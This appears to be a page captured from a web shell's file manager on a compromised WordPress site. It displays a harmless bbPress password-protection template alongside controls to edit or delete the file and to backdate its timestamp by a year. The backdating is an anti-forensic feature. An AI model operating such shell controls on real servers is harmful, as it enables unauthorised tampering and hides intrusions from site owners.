文件操作 - form-protected.php
返回文件管理
返回主菜单
删除本文件
文件: /var/www/vec.uaysen.cl/html/wp-content/plugins/bbpress/templates/default/bbpress/form-protected.php
编辑文件内容
<?php /** * Password Protected * * @package bbPress * @subpackage Theme */ // Exit if accessed directly defined( 'ABSPATH' ) || exit; ?> <div id="bbpress-forums" class="bbpress-wrapper"> <fieldset class="bbp-form" id="bbp-protected"> <Legend><?php esc_html_e( 'Protected', 'bbpress' ); ?></legend> <?php echo get_the_password_form(); ?> </fieldset> </div>
修改文件时间
将文件时间修改为当前时间的前一年
删除文件